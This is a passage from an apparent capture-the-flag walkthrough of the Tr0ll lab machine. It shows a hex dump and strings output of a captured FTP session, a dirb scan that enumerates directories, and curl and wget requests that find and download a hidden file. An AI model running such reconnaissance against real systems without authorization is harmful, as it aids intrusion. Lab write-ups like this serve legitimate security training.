00000f50 2c 32 30 32 2c 31 37 32 0d 0a 00 00 7c 00 00 00 |,202,172....|...|
00000f60 06 00 00 00 98 00 00 00 00 00 00 00 41 00 05 00 |............A...|
00000f70 d7 b2 3b 8c 75 00 00 00 75 00 00 00 00 0c 29 5d |..;.u...u.....)]|
00000f80 04 92 00 0c 29 20 70 99 08 00 45 00 00 67 3e 09 |....) p...E..g>.|
00000f90 40 00 40 06 e8 76 0a 00 00 06 0a 00 00 0c 00 15 |@.@..v..........|
00000fa0 cc e1 9f 75 8e 12 62 2c 08 45 80 18 03 89 a8 d7 |...u..b,.E......|
00000fb0 00 00 01 01 08 0a 00 1a c4 83 00 05 e1 57 32 30 |.............W20|
00000fc0 30 20 50 4f 52 54 20 63 6f 6d 6d 61 6e 64 20 73 |0 PORT command s|
00000fd0 75 63 63 65 73 73 66 75 6c 2e 20 43 6f 6e 73 69 |uccessful. Consi|
00000fe0 64 65 72 20 75 73 69 6e 67 20 50 41 53 56 2e 0d |der using PASV..|
00000ff0 0a 00 00 00 98 00 00 00 06 00 00 00 7c 00 00 00 |............|...|
00001000 00 00 00 00 41 00 05 00 0d b3 3b 8c 59 00 00 00 |....A.....;.Y...|
00001010 59 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |Y.....) p...)]..|
00001020 08 00 45 10 00 4b c8 23 40 00 40 06 5e 68 0a 00 |..E..K.#@.@.^h..|
00001030 00 0c 0a 00 00 06 cc e1 00 15 62 2c 08 45 9f 75 |..........b,.E.u|
00001040 8e 45 80 18 00 1d 02 90 00 00 01 01 08 0a 00 05 |.E..............|
00001050 e1 57 00 1a c4 83 52 45 54 52 20 73 65 63 72 65 |.W....RETR secre|
00001060 74 5f 73 74 75 66 66 2e 74 78 74 0d 0a 00 00 00 |t_stuff.txt.....|
00001070 7c 00 00 00 06 00 00 00 6c 00 00 00 00 00 00 00 ||.......l.......|
00001080 41 00 05 00 27 b4 3b 8c 4a 00 00 00 4a 00 00 00 |A...'.;.J...J...|
00001090 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
000010a0 00 3c 4f e9 40 00 40 06 d6 c1 0a 00 00 06 0a 00 |.<O.@.@.........|
000010b0 00 0c 00 14 ca ac 45 83 8b 6a 00 00 00 00 a0 02 |......E..j......|
000010c0 72 10 61 94 00 00 02 04 05 b4 04 02 08 0a 00 1a |r.a.............|
000010d0 c4 83 00 00 00 00 01 03 03 05 00 00 6c 00 00 00 |............l...|
000010e0 06 00 00 00 6c 00 00 00 00 00 00 00 41 00 05 00 |....l.......A...|
000010f0 34 b4 3b 8c 4a 00 00 00 4a 00 00 00 00 0c 29 20 |4.;.J...J.....) |
00001100 70 99 00 0c 29 5d 04 92 08 00 45 00 00 3c 00 00 |p...)]....E..<..|
00001110 40 00 40 06 26 ab 0a 00 00 0c 0a 00 00 06 ca ac |@.@.&...........|
00001120 00 14 48 0b cb 55 45 83 8b 6b a0 12 71 20 6d b0 |..H..UE..k..q m.|
00001130 00 00 02 04 05 b4 04 02 08 0a 00 05 e1 57 00 1a |.............W..|
00001140 c4 83 01 03 03 0a 00 00 6c 00 00 00 06 00 00 00 |........l.......|
00001150 64 00 00 00 00 00 00 00 41 00 05 00 c1 b4 3b 8c |d.......A.....;.|
00001160 42 00 00 00 42 00 00 00 00 0c 29 5d 04 92 00 0c |B...B.....)]....|
00001170 29 20 70 99 08 00 45 00 00 34 4f ea 40 00 40 06 |) p...E..4O.@.@.|
00001180 d6 c8 0a 00 00 06 0a 00 00 0c 00 14 ca ac 45 83 |..............E.|
00001190 8b 6b 48 0b cb 56 80 10 03 91 0a 0f 00 00 01 01 |.kH..V..........|
000011a0 08 0a 00 1a c4 83 00 05 e1 57 00 00 64 00 00 00 |.........W..d...|
000011b0 06 00 00 00 b0 00 00 00 00 00 00 00 41 00 05 00 |............A...|
000011c0 52 b5 3b 8c 8d 00 00 00 8d 00 00 00 00 0c 29 5d |R.;...........)]|
000011d0 04 92 00 0c 29 20 70 99 08 00 45 00 00 7f 3e 0a |....) p...E...>.|
000011e0 40 00 40 06 e8 5d 0a 00 00 06 0a 00 00 0c 00 15 |@.@..]..........|
000011f0 cc e1 9f 75 8e 45 62 2c 08 5c 80 18 03 89 82 5e |...u.Eb,.\.....^|
00001200 00 00 01 01 08 0a 00 1a c4 83 00 05 e1 57 31 35 |.............W15|
00001210 30 20 4f 70 65 6e 69 6e 67 20 42 49 4e 41 52 59 |0 Opening BINARY|
00001220 20 6d 6f 64 65 20 64 61 74 61 20 63 6f 6e 6e 65 | mode data conne|
00001230 63 74 69 6f 6e 20 66 6f 72 20 73 65 63 72 65 74 |ction for secret|
00001240 5f 73 74 75 66 66 2e 74 78 74 20 28 31 34 37 20 |_stuff.txt (147 |
00001250 62 79 74 65 73 29 2e 0d 0a 00 00 00 b0 00 00 00 |bytes)..........|
00001260 06 00 00 00 f8 00 00 00 00 00 00 00 41 00 05 00 |............A...|
00001270 8f b5 3b 8c d5 00 00 00 d5 00 00 00 00 0c 29 5d |..;...........)]|
00001280 04 92 00 0c 29 20 70 99 08 00 45 08 00 c7 4f eb |....) p...E...O.|
00001290 40 00 40 06 d6 2c 0a 00 00 06 0a 00 00 0c 00 14 |@.@..,..........|
000012a0 ca ac 45 83 8b 6b 48 0b cb 56 80 18 03 91 82 f4 |..E..kH..V......|
000012b0 00 00 01 01 08 0a 00 1a c4 83 00 05 e1 57 57 65 |.............WWe|
000012c0 6c 6c 2c 20 77 65 6c 6c 2c 20 77 65 6c 6c 2c 20 |ll, well, well, |
000012d0 61 72 65 6e 27 74 20 79 6f 75 20 6a 75 73 74 20 |aren't you just |
000012e0 61 20 63 6c 65 76 65 72 20 6c 69 74 74 6c 65 20 |a clever little |
000012f0 64 65 76 69 6c 2c 20 79 6f 75 20 61 6c 6d 6f 73 |devil, you almos|
00001300 74 20 66 6f 75 6e 64 20 74 68 65 20 73 75 70 33 |t found the sup3|
00001310 72 73 33 63 72 33 74 64 69 72 6c 6f 6c 20 3a 2d |rs3cr3tdirlol :-|
00001320 50 0a 0a 53 75 63 6b 73 2c 20 79 6f 75 20 77 65 |P..Sucks, you we|
00001330 72 65 20 73 6f 20 63 6c 6f 73 65 2e 2e 2e 20 67 |re so close... g|
00001340 6f 74 74 61 20 54 52 59 20 48 41 52 44 45 52 21 |otta TRY HARDER!|
00001350 0a 00 00 00 f8 00 00 00 06 00 00 00 64 00 00 00 |............d...|
00001360 00 00 00 00 41 00 05 00 94 b5 3b 8c 42 00 00 00 |....A.....;.B...|
00001370 42 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |B.....) p...)]..|
00001380 08 00 45 00 00 34 2a 01 40 00 40 06 fc b1 0a 00 |..E..4*.@.@.....|
00001390 00 0c 0a 00 00 06 ca ac 00 14 48 0b cb 56 45 83 |..........H..VE.|
000013a0 8b fe 80 10 00 1e 0c ef 00 00 01 01 08 0a 00 05 |................|
000013b0 e1 57 00 1a c4 83 00 00 64 00 00 00 06 00 00 00 |.W......d.......|
000013c0 64 00 00 00 00 00 00 00 41 00 05 00 db b5 3b 8c |d.......A.....;.|
000013d0 42 00 00 00 42 00 00 00 00 0c 29 5d 04 92 00 0c |B...B.....)]....|
000013e0 29 20 70 99 08 00 45 08 00 34 4f ec 40 00 40 06 |) p...E..4O.@.@.|
000013f0 d6 be 0a 00 00 06 0a 00 00 0c 00 14 ca ac 45 83 |..............E.|
00001400 8b fe 48 0b cb 56 80 11 03 91 09 7b 00 00 01 01 |..H..V.....{....|
00001410 08 0a 00 1a c4 83 00 05 e1 57 00 00 64 00 00 00 |.........W..d...|
00001420 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001430 f1 b6 3b 8c 42 00 00 00 42 00 00 00 00 0c 29 20 |..;.B...B.....) |
00001440 70 99 00 0c 29 5d 04 92 08 00 45 08 00 34 2a 02 |p...)]....E..4*.|
00001450 40 00 40 06 fc a8 0a 00 00 0c 0a 00 00 06 ca ac |@.@.............|
00001460 00 14 48 0b cb 56 45 83 8b ff 80 11 00 1e 0c ed |..H..VE.........|
00001470 00 00 01 01 08 0a 00 05 e1 57 00 1a c4 83 00 00 |.........W......|
00001480 64 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |d.......d.......|
00001490 41 00 05 00 96 b7 3b 8c 42 00 00 00 42 00 00 00 |A.....;.B...B...|
000014a0 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 08 |..)]....) p...E.|
000014b0 00 34 4f ed 40 00 40 06 d6 bd 0a 00 00 06 0a 00 |.4O.@.@.........|
000014c0 00 0c 00 14 ca ac 45 83 8b ff 48 0b cb 57 80 10 |......E...H..W..|
000014d0 03 91 09 7a 00 00 01 01 08 0a 00 1a c4 83 00 05 |...z............|
000014e0 e1 57 00 00 64 00 00 00 06 00 00 00 7c 00 00 00 |.W..d.......|...|
000014f0 00 00 00 00 41 00 05 00 82 b8 3b 8c 5a 00 00 00 |....A.....;.Z...|
00001500 5a 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |Z.....)]....) p.|
00001510 08 00 45 00 00 4c 3e 0b 40 00 40 06 e8 8f 0a 00 |..E..L>.@.@.....|
00001520 00 06 0a 00 00 0c 00 15 cc e1 9f 75 8e 90 62 2c |...........u..b,|
00001530 08 5c 80 18 03 89 84 8d 00 00 01 01 08 0a 00 1a |.\..............|
00001540 c4 83 00 05 e1 57 32 32 36 20 54 72 61 6e 73 66 |.....W226 Transf|
00001550 65 72 20 63 6f 6d 70 6c 65 74 65 2e 0d 0a 00 00 |er complete.....|
00001560 7c 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 ||.......d.......|
00001570 41 00 05 00 a4 b8 3b 8c 42 00 00 00 42 00 00 00 |A.....;.B...B...|
00001580 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00001590 00 34 c8 24 40 00 40 06 5e 7e 0a 00 00 0c 0a 00 |.4.$@.@.^~......|
000015a0 00 06 cc e1 00 15 62 2c 08 5c 9f 75 8e a8 80 10 |......b,.\.u....|
000015b0 00 1d 56 f7 00 00 01 01 08 0a 00 05 e1 57 00 1a |..V..........W..|
000015c0 c4 83 00 00 64 00 00 00 06 00 00 00 6c 00 00 00 |....d.......l...|
000015d0 00 00 00 00 41 00 05 00 ae 73 5a 8c 4a 00 00 00 |....A....sZ.J...|
000015e0 4a 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |J.....) p...)]..|
000015f0 08 00 45 10 00 3c c8 25 40 00 40 06 5e 75 0a 00 |..E..<.%@.@.^u..|
00001600 00 0c 0a 00 00 06 cc e1 00 15 62 2c 08 5c 9f 75 |..........b,.\.u|
00001610 8e a8 80 18 00 1d 83 05 00 00 01 01 08 0a 00 05 |................|
00001620 e3 4f 00 1a c4 83 54 59 50 45 20 41 0d 0a 00 00 |.O....TYPE A....|
00001630 6c 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 |l...............|
00001640 41 00 05 00 f3 74 5a 8c 60 00 00 00 60 00 00 00 |A....tZ.`...`...|
00001650 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00001660 00 52 3e 0c 40 00 40 06 e8 88 0a 00 00 06 0a 00 |.R>.@.@.........|
00001670 00 0c 00 15 cc e1 9f 75 8e a8 62 2c 08 64 80 18 |.......u..b,.d..|
00001680 03 89 c8 f2 00 00 01 01 08 0a 00 1a c6 7b 00 05 |.............{..|
00001690 e3 4f 32 30 30 20 53 77 69 74 63 68 69 6e 67 20 |.O200 Switching |
000016a0 74 6f 20 41 53 43 49 49 20 6d 6f 64 65 2e 0d 0a |to ASCII mode...|
000016b0 80 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 |........|.......|
000016c0 41 00 05 00 33 75 5a 8c 59 00 00 00 59 00 00 00 |A...3uZ.Y...Y...|
000016d0 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
000016e0 00 4b c8 26 40 00 40 06 5e 65 0a 00 00 0c 0a 00 |.K.&@.@.^e......|
000016f0 00 06 cc e1 00 15 62 2c 08 64 9f 75 8e c6 80 18 |......b,.d.u....|
00001700 00 1d 00 8f 00 00 01 01 08 0a 00 05 e3 4f 00 1a |.............O..|
00001710 c6 7b 50 4f 52 54 20 31 30 2c 30 2c 30 2c 31 32 |.{PORT 10,0,0,12|
00001720 2c 31 37 32 2c 37 34 0d 0a 00 00 00 7c 00 00 00 |,172,74.....|...|
00001730 06 00 00 00 98 00 00 00 00 00 00 00 41 00 05 00 |............A...|
00001740 09 76 5a 8c 75 00 00 00 75 00 00 00 00 0c 29 5d |.vZ.u...u.....)]|
00001750 04 92 00 0c 29 20 70 99 08 00 45 00 00 67 3e 0d |....) p...E..g>.|
00001760 40 00 40 06 e8 72 0a 00 00 06 0a 00 00 0c 00 15 |@.@..r..........|
00001770 cc e1 9f 75 8e c6 62 2c 08 7b 80 18 03 89 a3 fd |...u..b,.{......|
00001780 00 00 01 01 08 0a 00 1a c6 7b 00 05 e3 4f 32 30 |.........{...O20|
00001790 30 20 50 4f 52 54 20 63 6f 6d 6d 61 6e 64 20 73 |0 PORT command s|
000017a0 75 63 63 65 73 73 66 75 6c 2e 20 43 6f 6e 73 69 |uccessful. Consi|
000017b0 64 65 72 20 75 73 69 6e 67 20 50 41 53 56 2e 0d |der using PASV..|
000017c0 0a 00 00 00 98 00 00 00 06 00 00 00 68 00 00 00 |............h...|
000017d0 00 00 00 00 41 00 05 00 40 76 5a 8c 48 00 00 00 |....A...@vZ.H...|
000017e0 48 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |H.....) p...)]..|
000017f0 08 00 45 10 00 3a c8 27 40 00 40 06 5e 75 0a 00 |..E..:.'@.@.^u..|
00001800 00 0c 0a 00 00 06 cc e1 00 15 62 2c 08 7b 9f 75 |..........b,.{.u|
00001810 8e f9 80 18 00 1d a5 e1 00 00 01 01 08 0a 00 05 |................|
00001820 e3 4f 00 1a c6 7b 4c 49 53 54 0d 0a 68 00 00 00 |.O...{LIST..h...|
00001830 06 00 00 00 6c 00 00 00 00 00 00 00 41 00 05 00 |....l.......A...|
00001840 57 77 5a 8c 4a 00 00 00 4a 00 00 00 00 0c 29 5d |WwZ.J...J.....)]|
00001850 04 92 00 0c 29 20 70 99 08 00 45 00 00 3c 90 bd |....) p...E..<..|
00001860 40 00 40 06 95 ed 0a 00 00 06 0a 00 00 0c 00 14 |@.@.............|
00001870 ac 4a 8b d0 56 c6 00 00 00 00 a0 02 72 10 6c 55 |.J..V.......r.lU|
00001880 00 00 02 04 05 b4 04 02 08 0a 00 1a c6 7b 00 00 |.............{..|
00001890 00 00 01 03 03 05 00 00 6c 00 00 00 06 00 00 00 |........l.......|
000018a0 6c 00 00 00 00 00 00 00 41 00 05 00 64 77 5a 8c |l.......A...dwZ.|
000018b0 4a 00 00 00 4a 00 00 00 00 0c 29 20 70 99 00 0c |J...J.....) p...|
000018c0 29 5d 04 92 08 00 45 00 00 3c 00 00 40 00 40 06 |)]....E..<..@.@.|
000018d0 26 ab 0a 00 00 0c 0a 00 00 06 ac 4a 00 14 83 36 |&..........J...6|
000018e0 10 1f 8b d0 56 c7 a0 12 71 20 f6 84 00 00 02 04 |....V...q ......|
000018f0 05 b4 04 02 08 0a 00 05 e3 4f 00 1a c6 7b 01 03 |.........O...{..|
00001900 03 0a 00 00 6c 00 00 00 06 00 00 00 64 00 00 00 |....l.......d...|
00001910 00 00 00 00 41 00 05 00 da 77 5a 8c 42 00 00 00 |....A....wZ.B...|
00001920 42 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |B.....)]....) p.|
00001930 08 00 45 00 00 34 90 be 40 00 40 06 95 f4 0a 00 |..E..4..@.@.....|
00001940 00 06 0a 00 00 0c 00 14 ac 4a 8b d0 56 c7 83 36 |.........J..V..6|
00001950 10 20 80 10 03 91 92 e3 00 00 01 01 08 0a 00 1a |. ..............|
00001960 c6 7b 00 05 e3 4f 00 00 64 00 00 00 06 00 00 00 |.{...O..d.......|
00001970 8c 00 00 00 00 00 00 00 41 00 05 00 c3 78 5a 8c |........A....xZ.|
00001980 69 00 00 00 69 00 00 00 00 0c 29 5d 04 92 00 0c |i...i.....)]....|
00001990 29 20 70 99 08 00 45 00 00 5b 3e 0e 40 00 40 06 |) p...E..[>.@.@.|
000019a0 e8 7d 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |.}.............u|
000019b0 8e f9 62 2c 08 81 80 18 03 89 39 d8 00 00 01 01 |..b,......9.....|
000019c0 08 0a 00 1a c6 7b 00 05 e3 4f 31 35 30 20 48 65 |.....{...O150 He|
000019d0 72 65 20 63 6f 6d 65 73 20 74 68 65 20 64 69 72 |re comes the dir|
000019e0 65 63 74 6f 72 79 20 6c 69 73 74 69 6e 67 2e 0d |ectory listing..|
000019f0 0a 00 00 00 8c 00 00 00 06 00 00 00 ac 00 00 00 |................|
00001a00 00 00 00 00 41 00 05 00 c7 78 5a 8c 8c 00 00 00 |....A....xZ.....|
00001a10 8c 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |......)]....) p.|
00001a20 08 00 45 08 00 7e 90 bf 40 00 40 06 95 a1 0a 00 |..E..~..@.@.....|
00001a30 00 06 0a 00 00 0c 00 14 ac 4a 8b d0 56 c7 83 36 |.........J..V..6|
00001a40 10 20 80 18 03 91 36 df 00 00 01 01 08 0a 00 1a |. ....6.........|
00001a50 c6 7b 00 05 e3 4f 2d 72 77 2d 72 2d 2d 72 2d 2d |.{...O-rw-r--r--|
00001a60 20 20 20 20 31 20 30 20 20 20 20 20 20 20 20 30 | 1 0 0|
00001a70 20 20 20 20 20 20 20 20 20 20 20 20 20 31 34 37 | 147|
00001a80 20 41 75 67 20 31 30 20 30 30 3a 33 38 20 73 65 | Aug 10 00:38 se|
00001a90 63 72 65 74 5f 73 74 75 66 66 2e 74 78 74 0d 0a |cret_stuff.txt..|
00001aa0 ac 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |........d.......|
00001ab0 41 00 05 00 cb 78 5a 8c 42 00 00 00 42 00 00 00 |A....xZ.B...B...|
00001ac0 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 00 |..) p...)]....E.|
00001ad0 00 34 f3 6f 40 00 40 06 33 43 0a 00 00 0c 0a 00 |.4.o@.@.3C......|
00001ae0 00 06 ac 4a 00 14 83 36 10 20 8b d0 57 11 80 10 |...J...6. ..W...|
00001af0 00 1d 96 0d 00 00 01 01 08 0a 00 05 e3 4f 00 1a |.............O..|
00001b00 c6 7b 00 00 64 00 00 00 06 00 00 00 64 00 00 00 |.{..d.......d...|
00001b10 00 00 00 00 41 00 05 00 dc 78 5a 8c 42 00 00 00 |....A....xZ.B...|
00001b20 42 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |B.....)]....) p.|
00001b30 08 00 45 08 00 34 90 c0 40 00 40 06 95 ea 0a 00 |..E..4..@.@.....|
00001b40 00 06 0a 00 00 0c 00 14 ac 4a 8b d0 57 11 83 36 |.........J..W..6|
00001b50 10 20 80 11 03 91 92 98 00 00 01 01 08 0a 00 1a |. ..............|
00001b60 c6 7b 00 05 e3 4f 00 00 64 00 00 00 06 00 00 00 |.{...O..d.......|
00001b70 64 00 00 00 00 00 00 00 41 00 05 00 54 79 5a 8c |d.......A...TyZ.|
00001b80 42 00 00 00 42 00 00 00 00 0c 29 20 70 99 00 0c |B...B.....) p...|
00001b90 29 5d 04 92 08 00 45 08 00 34 f3 70 40 00 40 06 |)]....E..4.p@.@.|
00001ba0 33 3a 0a 00 00 0c 0a 00 00 06 ac 4a 00 14 83 36 |3:.........J...6|
00001bb0 10 20 8b d0 57 12 80 11 00 1d 96 0b 00 00 01 01 |. ..W...........|
00001bc0 08 0a 00 05 e3 4f 00 1a c6 7b 00 00 64 00 00 00 |.....O...{..d...|
00001bd0 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001be0 8c 80 5a 8c 42 00 00 00 42 00 00 00 00 0c 29 5d |..Z.B...B.....)]|
00001bf0 04 92 00 0c 29 20 70 99 08 00 45 08 00 34 90 c1 |....) p...E..4..|
00001c00 40 00 40 06 95 e9 0a 00 00 06 0a 00 00 0c 00 14 |@.@.............|
00001c10 ac 4a 8b d0 57 12 83 36 10 21 80 10 03 91 92 97 |.J..W..6.!......|
00001c20 00 00 01 01 08 0a 00 1a c6 7b 00 05 e3 4f 00 00 |.........{...O..|
00001c30 64 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 |d.......|.......|
00001c40 41 00 05 00 93 80 5a 8c 5a 00 00 00 5a 00 00 00 |A.....Z.Z...Z...|
00001c50 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00001c60 00 4c 3e 0f 40 00 40 06 e8 8b 0a 00 00 06 0a 00 |.L>.@.@.........|
00001c70 00 0c 00 15 cc e1 9f 75 8f 20 62 2c 08 81 80 18 |.......u. b,....|
00001c80 03 89 89 64 00 00 01 01 08 0a 00 1a c6 7b 00 05 |...d.........{..|
00001c90 e3 4f 32 32 36 20 44 69 72 65 63 74 6f 72 79 20 |.O226 Directory |
00001ca0 73 65 6e 64 20 4f 4b 2e 0d 0a 00 00 7c 00 00 00 |send OK.....|...|
00001cb0 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001cc0 b8 80 5a 8c 42 00 00 00 42 00 00 00 00 0c 29 20 |..Z.B...B.....) |
00001cd0 70 99 00 0c 29 5d 04 92 08 00 45 10 00 34 c8 28 |p...)]....E..4.(|
00001ce0 40 00 40 06 5e 7a 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^z..........|
00001cf0 00 15 62 2c 08 81 9f 75 8f 38 80 10 00 1d 52 51 |..b,...u.8....RQ|
00001d00 00 00 01 01 08 0a 00 05 e3 50 00 1a c6 7b 00 00 |.........P...{..|
00001d10 64 00 00 00 06 00 00 00 68 00 00 00 00 00 00 00 |d.......h.......|
00001d20 41 00 05 00 7e ca 89 8d 48 00 00 00 48 00 00 00 |A...~...H...H...|
00001d30 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00001d40 00 3a c8 29 40 00 40 06 5e 73 0a 00 00 0c 0a 00 |.:.)@.@.^s......|
00001d50 00 06 cc e1 00 15 62 2c 08 81 9f 75 8f 38 80 18 |......b,...u.8..|
00001d60 00 1d 97 26 00 00 01 01 08 0a 00 05 f6 b9 00 1a |...&............|
00001d70 c6 7b 51 55 49 54 0d 0a 68 00 00 00 06 00 00 00 |.{QUIT..h.......|
00001d80 70 00 00 00 00 00 00 00 41 00 05 00 ce cb 89 8d |p.......A.......|
00001d90 50 00 00 00 50 00 00 00 00 0c 29 5d 04 92 00 0c |P...P.....)]....|
00001da0 29 20 70 99 08 00 45 00 00 42 3e 10 40 00 40 06 |) p...E..B>.@.@.|
00001db0 e8 94 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00001dc0 8f 38 62 2c 08 87 80 18 03 89 39 1e 00 00 01 01 |.8b,......9.....|
00001dd0 08 0a 00 1a d9 e5 00 05 f6 b9 32 32 31 20 47 6f |..........221 Go|
00001de0 6f 64 62 79 65 2e 0d 0a 70 00 00 00 06 00 00 00 |odbye...p.......|
00001df0 64 00 00 00 00 00 00 00 41 00 05 00 d5 cb 89 8d |d.......A.......|
00001e00 42 00 00 00 42 00 00 00 00 0c 29 5d 04 92 00 0c |B...B.....)]....|
00001e10 29 20 70 99 08 00 45 00 00 34 3e 11 40 00 40 06 |) p...E..4>.@.@.|
00001e20 e8 a1 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00001e30 8f 46 62 2c 08 87 80 11 03 89 27 fd 00 00 01 01 |.Fb,......'.....|
00001e40 08 0a 00 1a d9 e5 00 05 f6 b9 00 00 64 00 00 00 |............d...|
00001e50 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00001e60 66 cc 89 8d 42 00 00 00 42 00 00 00 00 0c 29 20 |f...B...B.....) |
00001e70 70 99 00 0c 29 5d 04 92 08 00 45 10 00 34 c8 2a |p...)]....E..4.*|
00001e80 40 00 40 06 5e 78 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^x..........|
00001e90 00 15 62 2c 08 87 9f 75 8f 47 80 11 00 1d 2b 68 |..b,...u.G....+h|
00001ea0 00 00 01 01 08 0a 00 05 f6 b9 00 1a d9 e5 00 00 |................|
00001eb0 64 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |d.......d.......|
00001ec0 41 00 05 00 ff cc 89 8d 42 00 00 00 42 00 00 00 |A.......B...B...|
00001ed0 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00001ee0 00 34 3e 12 40 00 40 06 e8 a0 0a 00 00 06 0a 00 |.4>.@.@.........|
00001ef0 00 0c 00 15 cc e1 9f 75 8f 47 62 2c 08 88 80 10 |.......u.Gb,....|
00001f00 03 89 27 fc 00 00 01 01 08 0a 00 1a d9 e5 00 05 |..'.............|
00001f10 f6 b9 00 00 64 00 00 00 05 00 00 00 6c 00 00 00 |....d.......l...|
00001f20 00 00 00 00 41 00 05 00 d6 ad cf 8d 01 00 1c 00 |....A...........|
00001f30 43 6f 75 6e 74 65 72 73 20 70 72 6f 76 69 64 65 |Counters provide|
00001f40 64 20 62 79 20 64 75 6d 70 63 61 70 02 00 08 00 |d by dumpcap....|
00001f50 41 00 05 00 4d 98 ed 8a 03 00 08 00 41 00 05 00 |A...M.......A...|
00001f60 09 ad cf 8d 04 00 08 00 43 00 00 00 00 00 00 00 |........C.......|
00001f70 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00001f80 6c 00 00 00 |l...|
00001f84
...we see it is a capture of a FTP session. Seems to be a transfer of a file named "secret_stuff.txt". However, we see a not so friendly message in the file as well.
root@kali:~/Walkthroughs/tr0ll# strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap
Time to get back to digging into the HTTP service on TCP port 80. The default page for the service only returns a "hacker" image. The /secret/ page returns a "troll" image. Downloading and checking each with exiftool produces nothing. Running dirb with the big dictionary also doesn't give us anything useful
root@kali:~/Walkthroughs/tr0ll# dirb http://10.183.0.218 /usr/share/dirb/wordlists/big.txt -o dirb-http-10.183.0.218.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb-http-10.183.0.218.txt
START_TIME: Sun May 19 22:53:38 2019
URL_BASE: http://10.183.0.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.183.0.218/ ----
+ http://10.183.0.218/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://10.183.0.218/secret/
+ http://10.183.0.218/server-status (CODE:403|SIZE:292)
---- Entering directory: http://10.183.0.218/secret/ ----
-----------------
END_TIME: Sun May 19 22:55:37 2019
DOWNLOADED: 40916 - FOUND: 2
Reconsidering the "taunt" message in the pcap file, they did mention a "super secret directory" (sup3rs3cr3tdirlol). Let's see if that exists...
root@kali:~/Walkthroughs/tr0ll# curl http://10.183.0.218/sup3rs3cr3tdirlol/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /sup3rs3cr3tdirlol</title>
</head>
<body>
<h1>Index of /sup3rs3cr3tdirlol</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="roflmao">roflmao</a></td><td align="right">2014-08-11 18:45 </td><td align="right">7.1K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.7 (Ubuntu) Server at 10.183.0.218 Port 80</address>
</body></html>
Looks like we have a directory listing with a single file, roflmao...
I'll download the file to see what it is.
root@kali:~/Walkthroughs/tr0ll# wget http://10.183.0.218/sup3rs3cr3tdirlol/roflmao
